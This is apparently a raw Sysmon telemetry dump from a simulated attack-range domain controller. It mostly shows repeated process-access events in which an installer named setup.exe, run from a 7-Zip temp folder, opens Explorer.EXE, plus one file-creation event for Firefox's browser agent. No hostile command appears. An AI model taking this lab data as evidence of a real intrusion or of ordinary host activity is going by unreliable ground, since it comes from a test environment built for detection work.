13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\default-browser-agent.exe2021-01-18 13:59:52.286 10341000x800000000000000014708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
